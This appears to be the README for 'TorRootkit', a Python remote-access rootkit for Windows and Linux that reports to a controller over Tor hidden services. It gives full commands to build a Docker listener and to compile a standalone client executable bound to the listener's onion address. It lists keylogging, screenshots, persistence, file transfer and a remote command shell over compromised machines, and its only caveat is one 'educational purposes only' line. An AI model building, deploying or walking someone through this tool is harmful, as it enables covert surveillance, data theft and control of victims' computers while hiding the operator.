A Python 3 standalone Windows 10 / Linux Rootkit. The networking communications are established over the tor network.
Use for educational purposes only.
- Clone with git:
git clone https://github.com/emcruise/TorRootkit.git- Change directory to the repository:
cd ./TorRootkitThe listener is designed to run on linux.
- Build docker container:
sudo docker build -t listener .- Run docker container:
sudo docker run -it listenerThe client runs on Windows and Linux.
Note:
- On Windows the build file bundles tor into a executable.
- On Linux the build file expects that tor is installed globally in order for the client to work.
- Change directory to client:
cd .\client- Install all pip3 dependencies:
pip3 install -r requirements.txt- Build executable from build.py:
- downloads Tor Expert Bundle (Windows)
- bundles python3 interpreter and tor expert bundle into 1 standalone .exe file
python build.py <listener-onion-address> <listener-onion-port>- Execute the bundled client (Windows):
.\dist\client.exe- Execute the bundled client (Linux):
./dist/client- Standalone executable, including python interpreter and tor
- The executable has a size of ~13MB on Windows and ~7MB on Linux
- the whole communication works over tor hidden services which guarantees some degree of anonymity
- The Listener can handle multiple clients
- The Client auto reconnects when a unexpected closed connection occurs
- cross-plattform compatibility
- Up- and Download functionality
- Screenshots
- Keylogging
- Persistence
| Command | Explanation |
|---|---|
help |
Shows the help menu |
^C or exit |
Exits the shell |
list |
lists all connected clients with their according index |
select <index> |
start shell with client |
| Command | Explanation |
|---|---|
help |
Shows the help menu |
^C or exit |
Exits the client shell and returns to listener shell |
os <command> |
Executes a command in the clients shell and returns the output |
background |
Keeps the connection to a client and returns to listener |
All contributions are appreciated.